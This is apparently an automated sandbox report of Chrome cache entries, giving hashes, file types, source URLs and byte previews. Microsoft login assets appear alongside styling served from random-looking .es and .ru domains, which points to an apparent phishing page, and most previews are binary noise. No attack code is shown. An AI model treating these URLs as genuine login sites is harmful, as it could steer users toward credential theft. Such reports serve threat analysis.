                                                                                                                    Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_2d gb_Pe gb_rd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Qd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_ld gb_pd gb_Hd gb_md\"\u003e\u003cdiv class\u003d\"gb_xd gb_sd\"\u003e\u003cdiv class\u003d\"gb_Kc gb_R\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Kc gb_Nc gb_R\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                    Chrome Cache Entry: 121

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 2477
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):1009
                                                                                                                    Entropy (8bit):7.787888874744244
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:8984F3389334F3D6F548FC2B37F29D3A
                                                                                                                    SHA1:201A8A7FA8C83A4DDC64EAEC3CC2C31874518FFE
                                                                                                                    SHA-256:8B5CE863FAAAF3E3690E37ADECB9FF5BE8C16994C9EAA737A952D6C696804F32
                                                                                                                    SHA-512:04B54B2E77D36044F8F3D54AAC71D526731AEA9A80A8789D38A3D282CA52979380F9EFFB53EC8F91A1B941D5B3B2D190CEA7524895A0C568A71E7056BC134F7F
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/check_small_48540c930333871c385fcba2c659ccdb.svg
                                                                                                                    Preview:..........]....6.........!)Q..L..u.....vg..n..2y..2E.=.e....?|..<^..o....r{zy..../O....^N...y...^^_/..............v....|~<......g...n|...o...}.-_..O.J-..9.V{."$.\..r.X...#."...\).X_S.\.5'..E.:..[........SM....H.]%.T..a[.....Q.. ..P..5..-..4.D.MT`....c+:.{..VUA...k.......*..5>.|.(y.a.....*..w.R......uV....,EL....qE..P`..E).9.b.-.2.@.5n..z.<V.L s.c.[9.u..Lf*..L...$x...C........l....^.......z....!....,..h...J(.]....e...2.:......L.T.h..X...]h..w.j..e..F....F.J.6/f..9sg..P2.9.:c5*..W.|.2..G7 .K0|.a.}.s...".$..M4.s..E....m0.l].....&.......Z..w.&_..........$....v.XY{3C....6V|...Vv.6...*.+...F..|.SJ..}...+...`....G...5@..q.@b.q]...:{.Q.c....8..;.....+.HK.....T .q..U..{.o...w.....j.f..|.S...wI....C..m.'R.1.S..s...X>.Y.m..)i...J....N".EVqK..v.m..X{..Q...e...%d...U.p.u.....G.0.N..hXg...?1.,...@....[....|.6".J.fD..H...T6.L..$....N_.c[....Wv...K...iy....k.>t...8m.....d.T `.v.b.]=.p...nwi.........M./.o.Y.. .....n..Mk{a.,0 .}1.3...2..........W/....e?Sz.

                                                                                                                    Chrome Cache Entry: 122

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):35786
                                                                                                                    Entropy (8bit):5.058073854893359
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:38501E3FBBBD89B56AA5BA35DE1A32FE
                                                                                                                    SHA1:D9B31981B6F834E8480BA28FBC1CFF1BE772F589
                                                                                                                    SHA-256:A1CA6B381CB01968851C98512C6E7F6C5309A49F7A16B864813135CBFF82A85B
                                                                                                                    SHA-512:1547937AA9B366E76DE44933EF48EF60E3D043245E8E3E01C97DFC2981F6B1F61463D9D30992FBCF2CA25FC1B7B32FF808B9789CFB965D74455522FC58E0C08C
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://y0x6.tjsqawfetli.es/abv5IA8EJpq3Qcgh23
                                                                                                                    Preview:#sections_godaddy {..font-family: gdsherpa !important;..}..#sections_godaddy a {.. color: var(--ux-2rqapw,#000);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. text-decoration: var(--ux-1f7if5p,underline);.. background-color: transparent;..}....#sections_godaddy #root {.. flex: 1 1 0%;..}....#sections_godaddy a:hover {../* color: var(--ux-1j87vvn,#fff);*/.. -webkit-text-decoration: var(--ux-1ft0khm,underline);.. text-decoration: var(--ux-1ft0khm,underline);..}....#sections_godaddy svg {.. overflow: hidden;.. vertical-align: unset;..}....#sections_godaddy .ux-button {.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. padding: 0;.. text-decoration: var(--ux-1f7if5p,underline);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. gap: 0.5em;.. cursor: pointer;.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. font-weight: inherit;.. background: transparent;.. gap:

                                                                                                                    Chrome Cache Entry: 123

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):28584
                                                                                                                    Entropy (8bit):7.992563951996154
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:
                                                                                                                    MD5:17081510F3A6F2F619EC8C6F244523C7
                                                                                                                    SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                                                                                    SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                                                                                    SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://y0x6.tjsqawfetli.es/GDSherpa-regular.woff2
                                                                                                                    Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..

                                                                                                                    Chrome Cache Entry: 125

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:very short file (no magic)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):1
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                    SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                    SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                    SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://7j87.nmpjkg.ru/machlo$a0iuc8
                                                                                                                    Preview:0

                                                                                                                    Chrome Cache Entry: 127

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):7390
                                                                                                                    Entropy (8bit):4.02755241095864
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                                                                                    SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                                                                                    SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                                                                                    SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14

                                                                                                                    Chrome Cache Entry: 128

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2905
                                                                                                                    Entropy (8bit):3.962263100945339
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:FE87496CC7A44412F7893A72099C120A
                                                                                                                    SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                                                                                    SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                                                                                    SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.

                                                                                                                    Chrome Cache Entry: 130

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):35970
                                                                                                                    Entropy (8bit):7.989503040923577
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                                                                                    SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                                                                                    SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                                                                                    SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://y0x6.tjsqawfetli.es/GDSherpa-bold.woff
                                                                                                                    Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........

                                                                                                                    Chrome Cache Entry: 131

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4937
                                                                                                                    Entropy (8bit):7.811267913901182
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:CE52AD7A5C1A9570A42D804F32059C56
                                                                                                                    SHA1:70F9C86C05F0628B4AC72D8C77FC70D6770736E9
                                                                                                                    SHA-256:FAC5922D060EBBE6A668B9FAFCBC284ECE3100754C742480FB58425ACD562603
                                                                                                                    SHA-512:61D9DCDA0684CABFD804B15DF56324130F62CDD4133CD0FEDD165517F2945395B710A23B6AB9804213D2515FE06B6CAFE007DCDF1F517CE90D4F0BAF8AFC7817
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    Preview:.PNG........IHDR...P...P............sRGB.........eXIfMM.*.............................J...........R.1.........Z.i.........l....................www.inkscape.org...........................P...........P.....\......pHYs..........#.k...-iTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <xmp:CreatorTool>www.inkscape.org</xmp:CreatorTool>. <tiff:YResolution>26</tiff:YResolution>. <tiff:Orientation>1</tiff:Orientation>. <tiff:XResolution>26</tiff:XResolution>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>.G..-....IDATx..\ip.........1G%`$..$..*.!..lk%.....c..7.R.....+U....&...dY...%..*.*."X..H....ju.Nw....W.H.+.eu.4;3===...~._.c....vf)..8..zC...~.9..u.P.L$..9.19.Z~.`K./......QM{..l..8.....N.3

                                                                                                                    Chrome Cache Entry: 133

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):17842
                                                                                                                    Entropy (8bit):7.821645806304586
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:4B52ECDC33382C9DCA874F551990E704
                                                                                                                    SHA1:8F3BF8E41CD4CDDDB17836B261E73F827B84341B
                                                                                                                    SHA-256:CCE050CC3B150C0B370751021BB15018EE2B64AC369E230FE3B571A9B00D4342
                                                                                                                    SHA-512:AC3D3C82BAD9147AE5F083ED49C81A744F672DDFBB262135AA3F2C6601F8DFFEA11D8E323CEF025C36D76C6F2515AA6814B622CF504CA01D13346E9EA989048F
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    Preview:RIFF.E..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.,...$.m.8..k.\.oDL.. ..TU....3'.{.g..6..2...6.DL`e..."&@..b.#&@......T.....'.....$......1.d...G........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........._...........................?...Z5[...B,.c...V-...m.0.../..?...............?.......?................_.....-...M.B.....=....C...[......w .X...ea.............VW.?b....[[.o^.Y.K...OD

                                                                                                                    Chrome Cache Entry: 134

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113766
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):35172
                                                                                                                    Entropy (8bit):7.993306956066695
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:
                                                                                                                    MD5:2BF248B861E9D2702141EFF7312AA6A0
                                                                                                                    SHA1:5907BEFBD4B8EBE7BACD2216D15AA8512C4A7C94
                                                                                                                    SHA-256:9A7DCDD9B3ADB0C378A9952BD37A88F82ECB415432E6751F5689AAC7C1F84E4A
                                                                                                                    SHA-512:2F9DEA9ADB60B5C108656805614DF15A320FFB8EFA13DFD75A5C197D3F62E8B48BD56F28BE17835603325FB27522C8AEB2D2C5024F3B1E25511853F4A91D5B91
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergederror_stringcustomizationhelper_0f9cee44e29a619abbaf.js
                                                                                                                    Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v..Z;...r..._........,...A........:....|..t.. [.C..V..fo..S.....~.6=?._{...>.X.v.j$.kw.*,........(........~....P..}..gAvI.V.p....._....Eq.[p...(Q.GA.x....J...x.L....$../.......)..l.......Z..-....m....&.N@@..,*..|}...........H'...dpVC...5f_..L...~.......l-.......w.....4.y0.66....,."....~..L...2..=.4=....z.. ~....+...K2..av.x k.V..v..-^.0... y..G..<&....(*..k...) ...&.0Dv.....u.W.</.y.......*yP...

                                                                                                                    Chrome Cache Entry: 135

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (65447)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):89501
                                                                                                                    Entropy (8bit):5.289893677458563
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

                                                                                                                    Chrome Cache Entry: 140

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):17174
                                                                                                                    Entropy (8bit):2.9129715116732746
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                    SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                    SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                    SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                                                                                    Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

                                                                                                                    Chrome Cache Entry: 141

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):673
                                                                                                                    Entropy (8bit):7.6596900876595075
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:0E176276362B94279A4492511BFCBD98
                                                                                                                    SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                                    SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                                    SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                                                                    Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...

                                                                                                                    Chrome Cache Entry: 142

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:GIF image data, version 89a, 352 x 3
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):3620
                                                                                                                    Entropy (8bit):6.867828878374734
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                                    SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                                    SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                                    SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                                                                                    Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...

                                                                                                                    Chrome Cache Entry: 143

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):1093
                                                                                                                    Entropy (8bit):5.000560837607814
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
